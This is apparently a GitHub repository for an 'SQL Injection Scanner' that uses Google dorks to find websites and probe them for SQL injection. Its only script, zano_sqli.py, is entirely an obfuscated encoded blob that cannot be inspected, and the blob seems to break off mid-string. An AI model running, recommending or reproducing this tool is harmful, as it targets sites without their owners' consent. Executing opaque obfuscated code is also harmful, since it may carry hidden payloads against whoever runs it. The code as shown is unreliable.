├── requirements.txt ├── .github └── workflows │ └── python-package.yml ├── README.md └── zano_sqli.py /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | colorama 3 | pycryptodome 4 | -------------------------------------------------------------------------------- /.github/workflows/python-package.yml: -------------------------------------------------------------------------------- 1 | # This workflow will install Python dependencies, run tests and lint with a variety of Python versions 2 | # For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python 3 | 4 | name: Python package 5 | 6 | on: 7 | push: 8 | branches: [ "main" ] 9 | pull_request: 10 | branches: [ "main" ] 11 | 12 | jobs: 13 | build: 14 | 15 | runs-on: ubuntu-latest 16 | strategy: 17 | fail-fast: false 18 | matrix: 19 | python-version: ["3.9", "3.10", "3.11"] 20 | 21 | steps: 22 | - uses: actions/checkout@v4 23 | - name: Set up Python ${{ matrix.python-version }} 24 | uses: actions/setup-python@v3 25 | with: 26 | python-version: ${{ matrix.python-version }} 27 | - name: Install dependencies 28 | run: | 29 | python -m pip install --upgrade pip 30 | python -m pip install flake8 pytest 31 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi 32 | - name: Lint with flake8 33 | run: | 34 | # stop the build if there are Python syntax errors or undefined names 35 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics 36 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 37 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 38 | - name: Test with pytest 39 | run: | 40 | pytest 41 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SQL Injection Scanner 2 | 3 | This project is a tool for scanning websites for SQL Injection vulnerabilities using Google Dorks and the Google Custom Search API. 4 | 5 | ## Contents 6 | 7 | - [Introduction](#introduction) 8 | - [Requirements](#requirements) 9 | - [Installation](#installation) 10 | - [Usage](#usage) 11 | - [Contributors](#contributors) 12 | 13 | ## Introduction 14 | 15 | This tool utilizes the `requests` library to make HTTP requests, the `colorama` library to enhance terminal output, and the `pycryptodome` library to obfuscate the code. The aim is to find vulnerable sites and query for SQL Injection vulnerabilities. 16 | 17 | ## Requirements 18 | 19 | Before you begin, ensure you have the following prerequisites: 20 | 21 | - Python 3.x 22 | - `requests` library 23 | - `colorama` library 24 | - `pycryptodome` library 25 | 26 | You can install the required libraries using pip: 27 | 28 | 29 | pip install requests colorama 30 | 31 | ## Installation 32 | Clone the repository to your local machine: 33 | ```bash 34 | git clone https://github.com/zaxzax98/sqliscaner.git 35 | cd sqliscaner 36 | chmod +x * 37 | pip install -r requirements.txt 38 | ``` 39 | ## Usage 40 | 41 | To run the tool, use the following command: 42 | 43 | ```bash 44 | python zano_sqli.py 45 | ``` 46 | 47 | Follow the prompts to input the dork, the number of results you want, and the domain (if applicable). 48 | 49 | ### Example user input: 50 | 51 | ``` 52 | Enter the Google Dork: inurl:index.php?id= 53 | Enter the number of search results: 10 54 | Enter the domain (optional, e.g., iq, il.com, etc.): example.com 55 | ``` 56 | 57 | ## Contributors 58 | zano_security 59 | 60 | -------------------------------------------------------------------------------- /zano_sqli.py: -------------------------------------------------------------------------------- 1 | pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98) 2 | pyobfuscate({getattr(__import__(Il),lIl)(lI,'',"https://pyobfuscate.com"):"IlIIIlIlIIlIllIllIlIIIIIIlIlIIIIIIl",'pyc':"""i5E@3SsM=v^>8c<9k#1@3k%f|5&uJMp_5_)iV~Nvuta>!pwCD~FbO8d6N=$+q#_87bqEq$qvHV0f*JEoN$WWnCu5f-J42_ItUPveX%p|W-K5$E`@b}Yp&h6&sqn64J!O+BnBP>5T6C}~ifkeslUuH!ZxbxP;yM*9{|6gfgJi0lD%*0dvNjtJjcj3OA$Z^|(j1|0DfthN>6TL~nimq~Ushj}IT+r;kBqL&qkOo*V9b6l^S=a^wU1-cf9UnLh?Q8Rcz(#^fov=`KWb9`iX{{ZX&|soRoSP<9nM*Nin+(Y=t&x$QYAZ!Z~Mv53i)!!>YMSy~b%&b#{wPW2-ql5)eP9T1ii|TZwGaFv1Re=npnoAgHOnMLddvzv-q!-FuMqu)xT)75nm*W$Hk-K)m%1`Fg>dQqx<4tZHAyniaM~0go|QU9Q~Z4VHaxaKs`H{7%wtvhRz`vNanAsp5N@0FbP*ztN$QgzJygYLeV<0NgmUYnS5-A00?+{eJ*qW3a3v8I$N1UN0>5k&ew~+p>6BP_6+OVO{_&JO7TpAOm?`0Ig!cRn=G;u-*a_bPafsSp0~9wj5kKqp`$b#lbeC0`@JY-Cdi0!vY8CW7*_Vh|#(+|=d}_~KbQ|2l_R=~QJ?fP4rC{g)Ct7qZ)_YO-65`@A%$*&vO?@8kKb`FLW&I#ywzE9Sm)>01*(>YcTpn$hlLi~1BF87u3494|ccuU2t%;g&0;oHqZH$Evr(W&7AOSu7$N9m(C?f>O)g49`h-AUI0g&O1{G2|ccr;lSBCMY^`n&m#DmdK-IKaK7&ZM9X$6LLBv-6)z$Kh1ajy#^2J8^?M?BDgI&yF{Npzu@akT%LoFB!Dc5%MUb-R7>ZyL1cc)?2p0v1sY$xC6_z>opoY&0@_SizfjVxz!n2O8{j6%o=7%WEhH_7-0i%;TP=MLQ(im7{!*Mf=9%!MENs*?7g#W!^icphq!NSv8&I?=Ev`zkU12$kno`*a6RYuwF7cl{&oxAVGR&*SU*C3q&Wu+g=#l$h&2W$Mqh8O2=3rXkOPVP@2W<1P}}GvXbzxp%p+-^sQ*xq}q-*RjAZH5G64Va3%T`E4qYw3g9}&hM>-G0U8znMV+5`L9+MH2SLFb_?aN^1*Eg|+3i;}@LVVeI>6NrMd?DvW}muCP~}^Y-G4_Qtkp@rDqd-Cg|}ip77q(blnJvHlVUlhzO?V%xzR%?!n}nhR`0gAK&6QpR=StKSS@4oA2FlNS0FRT&XFBc}Zc1Eirq@4>i;#z1}HRTcNhh=IfHms3^&rP>Vg7k`htxmKK5ZnRn@@P~r_;C{C7B2cAdk|CJPWTj2xpizic4YNz!(mTy%3f4+G%=T;&bDV=9B+SPHIi2nw3OJn8y|O3-n|ZPp*9DR3lk)3|MHfXqHNgN)5{9<$(w-%XZ!H>yJckCa8K2kE2-muVSxc&*TprU8l7Xj%5ud?im{{aMqoji~d~rT@b=;o9H&*)7NRVd~Am|UyDn8<_29=6bz}$jc@~yZgN$rH2Z#7JuO~I2*<48)kn{a5Z_xq!A`mTKN4dDG1%RZ)62^&Alsc+cZk$x-&J8ddNp-BYeAqhAy~-tl+!?z5rHw^7J&`zr&PK5ab21P+S-GjaN){T*>+<0+t$=F{V>iNTBOfG?62MNm_q>DkDS=vX0z=mvto55y6;aCw2*GbCr*47*ps0hb?TLK%79{l)K7PzV9HtF@&&$z^?$1~E2C-O_MYn_7DSXu;(y-v389lw5OuVnkl?&au9u41kDjCWnzhycQ|oNxwmB1R`BHa76$TFE!`-yvEn+L$$o&}s{cmyPvs8wPAvda!N3U>TPG{QUJLuI6;r0S@Ko^!MKKk?8H#2}r-P9;?)yP4A*;oFMqS5h62Zlp!8v;U^ha7S0HptWpJ4d5O^GE+`B$eHCCxsspP{?SH)mqO>@S$#j*J$*T=^xWp35lDXJ=ILsrHnH{*{o-xeLi%*oM&DCK0k}^b)bw#IrmgSd%se2)sdOV1$TPE`T{rE3U?6s@dz7Kdpuy!4>8UMiiHqtB)ha6xGvjCtQm^zT)!zV$*nq$!WBwV1g2QSQy9u61bE9JR@M@UHhnRtod^!GKla^y;9k~<@OYgZZj6!A$-N~G#``lTZGLcYec!T?^GgY?jQ3l?bN=54Hwg4now%<;fWvkf|$Fgboa`2AMo($hzY=X`$cc&8u!qzr@OF40T7hx~(wteJ5xyDBEhF^KaZGk<8S*+84$I{+Vnh{#k*&=&6?amQA)n?A|%EKPPunowqAHz2j-{y#=zA$pd>VXPCT)6WSLc|y=sF+g99Jr(UuO0KbFMaZUtJ}S*~x1}*!{mCsb5_PDpIm#pFkFT3kVPfBrrrQtAp2pWqOzt1?bzgsU{k5A9lmBynU9(XB?hj1Suxq*Cyc?hNlaZ$|_PM7K#nIOwq~MbiTVJAu1{@Qlc7-h1TC%Zof#?}t-S{!X?jIo8nNLk{mxJ_5D3RA(L1xKEM1u|YVV93dcw4A4D*_FJ1rT;wZB~wSY$rm6h80sxu;e<6kuQA>7K&zH_?=}0!vWkcB#xMszYtfBgGJ0ky+h+4^+{>r^&|&{+_o!{*sC@1`-qNp(i4P>^WPd5kDlS0<2QrnM9HRStU{lAz7=P%cM7t5t`wK~oM8oVBgl7z4;JGE_JDRr=YIVTCfM^}ltq`om+`cAL{xrjjm{`oGltleiYL=hDBR$IMg!)KV!c$IJ4>t`R@_QZRn}5Gi1v&H@s?35jnFb$JK&NRXL8Hz3V#p1MeY)AxEa5UstV;;Z7*KTfys8)ue0&>4mZ-(nsh@>{SHxYCwxN33#FZjkQDihq;93CNzxFLyx#gZ2D9?YKfoorlU~smYP8zwWg`XJPkA3b)H&;FJkF0SWjHC{JIdn&>&jXwDu?NcPeD#^C|4<;Dv*pTWkTc|j2Z;(p*;@k6VtFl7sY$EyQQ&bYyjiDNGx9t(0>SmpEj+QyJ!<^9WaX%$Ve`@3o;%(vK*3q#QoG@z{woa1$lPJS&66zlDI?~{tTD+fI=huHRT*$r}toZAQ51Ht5)ds~jbPu_$04jhs3{qWv;&YxB12G7vOI{kw?1D`(XQ41XPM}7@&j}Bk^{JcKswk|kCviI^kBrw3*;FB`@qq4{e3n{1-{WazcwbBx8{c0bSVh1nq`X}!oT%_o;yuN6@TN;|$5k#msO@NFhg$Bnwg8VecnpWtqzrt@g6~GuayC;fwP#k;<0`kJmQkLq_ot9|+csN&y#IWlD9Ms$9F#B;G%l)DpoI)NZ|uOpi?0y48(hdekXnhQwWES30qP`@RgLiR9a>YzVl?`@xp}gK74+6g(mJfoiFd1W6=TsX$NMg`_%Br+JaXH;Hs753W)vU(9QZ89wMjl=_wc#rBx#P9Tv(QS37mRiF7Qc1=U|4uVzjUSZ%o;GWGRj;Ms+i+n6B^io$%&8zh7j{L!yNbU-mG$J4=|V-Nq9c+RW>qIP1)pKQOoM}xTAt=KcX6*apmWi0|W0GwU>0rLlSHeZl=I_zH!g3UTP1z;#V&7nKWH&jRQ5;m7-~V+gLFtrF%(|dC5&s&xgRo}U2I=Q`!Sbv|#v?;}1RZ$ZS{&!cP7Zk2-=|RRde)~$Q1b&85#V+bqS0u_R?!~cruX0nK-_cYXUhGSEl9w-;2muJk(C&dn}w3y+R+v-+ue-Urg1;H^xHboVToxba7O0{Kr>d4`UZ;nXR`4)pI5FX6u_;dT*lrQ17RfnKKqxWiJ5M*WaWrib84zo{e8A9dbz9N2c2e@nWhK7E*vORLvPh4#g-jONev%psW-HZY#4iUCyO9+L7o^ayR?tBj5@#(iv9_8(Q0YNH9===@y1cMi^=qQg}WyAgz4_K>1LY%>oPu4cac4d9GC)Kt0tzX+bwPn{+wnc%?L%Bk)T#rLToWOE(JJ%mNavkZlIlrDV6NuqWAQ>q{?$~}-349SfN`g>Q!%|l`)S5tQK0ygFPbPlS`2E-{5O=j<)86dwgz~|dE^P(^Hwi<^$zC84R#>3)ly@CdqEaJvlAhNhOM?do-G{Bg-DrF`(5EbTz;r4(r0g;{|+m(T$lrkUOo1vzn8CSE2zs?D5goovW@oKJHgf4>a4#CY#eXN%l{a0H?0bghF0rC1uvH!DHCO-xO%IFo^Pi#QmFzcuf@Ca@>XLf+*O#km_!VjdU%)EctI&`&{l&0OZ(6vN;))6OT8M(X22fcHCU_Bxcc4-yxA6m;Ydp;Aa$1~zZXOoBPuaN_FRvvcAQ<X?q+zU3dtcqd=g#QbsO2xrjhIJ1yQ1&yKTGk+M`fO?=0KKSzr|5gJ1L@8md-Be=*y;o~zBm-(jFt}ufKXIQJUI#9yqFG3>puoRx(Q|fA&-edFB!F58Ou*C^tvDhJEUHX2Hf-Rshh2xBLgC;baeGKVbZD+_@IBjJoE?yqSgV?A^ZWOctof*pau;)FzVNCWx|~CT!x&~dW_i#ysbG%Bbq$4oHRb;K99QEP2e$&9^$y{}sE%arZ$`tGq&;c69cfzWc_Wh*!k0#J9xN$d-5zV_+~W!JA*A&B*fLVtv-T03KHzwhEuOZAp^4292TtjMP|a);8LJJ&3$O!Z+hj>7o)KN+SuPJ6>dJB=^?h$2pH7=A?o<5d$6fG61RZ1*d0b)}Cj|O7Mo@BB)c?IiGz<(Z#Mt%3ul6{9w_sj3Gbb$hP$Zg<^zKq@3m|}vapr$q;h7-FOICs_WwNRbTD*zyZqH*FIA;yxoPaY|kIw`fWE4!3l1pv?y>b9^kfZWyFEyw#;qkDh2-VIYoMq;c;B^#Mw$uS&T{W>bh32081maPq~d9|f7nx@Q}Tb9JVS_t3eR7AIlo2)7j3akDGul>_|s?xEKDS9~QlINKoiPLX^wZAhE1f|&Yclf5CzxnFYS1pa0K?s__&@;kGsnCJ7rntOnry(YSzUPDtG97cP8ZHi5I%w6^P{0YoT9Uybr%(cq`oa$uOg46!jd4MX8Lc?CwRi>X0mD>_{E12)RaTHJrH2h~^aIVe&ZpQiAD>7qVo(a-i5A?DxYR@9dM@_=Y&`JOH$%!gTze(oK&j&BByi4eB9i2r#tPv)w3*=eHuI{favqS_H}|7iR*axNfBs^j|E3lrF!Ag@Ay+^!Jh~XRRHT!sn;T)Cb3j-XexyYx6G6ZUrK1w`RT^)pSzaGa7v0GK=UNSrDhx#HDxxI1~FfkK9SAnvnn1&-L>QspIEc!O!r_!V)%=NvSR8SSsH@FJ!Fn@){gg)w3~?DLUgApxY?C$t%W9xY@xRnt~i`QNT)=(-j{Ni%U_U)dK*0~%5zH%%JZ1yX*&&AKkhOg9w1}_O%;+^$$HA$MwPK?HRhNi4pZlZUg%cWjq8=j8w0t@s$>M}Hh@MTWBe(QwN}gtu_IUDtHQ|wxlr~8+1S!C|0S`o13&qJhWx%cMd5wk30rX&!i{UkO&P39B(!lHpipC*C`e{6X*|Wx33xFdj3G2W-kFAt#}5Fg-_1G?x*FmU7)%07q}&i>9`l7+d!ZrNioOE%A`x408=~MSV9SBP^hGO&dPUJ=G0P7ExoL(*S$&>na&gL2VZzXJ$)0c0#cv2(r7t?B5R_erPt^t8PX!vU0j%%dcjWTe-lA{YxAQK4v{tRpM3H`mRQL|N?$`~}DH1uuEUU{COf-*AGz0?h7{nF(7}#i&&!ZMxqVG>vjw+)U&MOt!mYN*imsD*Fg^9vx_kw(Lm7|rQqG5ux_xdF)Q`q4O3b%U`rVny9eqSxLJFtIWP|Z8=zI}5@hy2ZM#@de)_%JXnPvo>c#QxJMN5+8O!3+ObGW*7cmGPE4!l`$&d_0ZyyQqZ(Q4J0uULmd?Zy#KK#n74hzRJeqOt?`G{EZgHar@{ZCMPOm3Du1OaL}9E>GGQ`3WYUJFR;;QrNrNEd$`EJ@}<7)&?M}cXIjJK5UPJWcz?|QL4z;DUVx-HV8K|YMO0WP&5WqJStXbj`U?Yd=A)`^9+@}e}U}hm|78V;&Le`C47r$Y<_#2tsUf6=bg}V%&eo~TMIc>zX@(x6^ia>_1L3#Br>3g{{N)iVc!^|xdo1u{uU@(R0-lNgyXsGo-2n@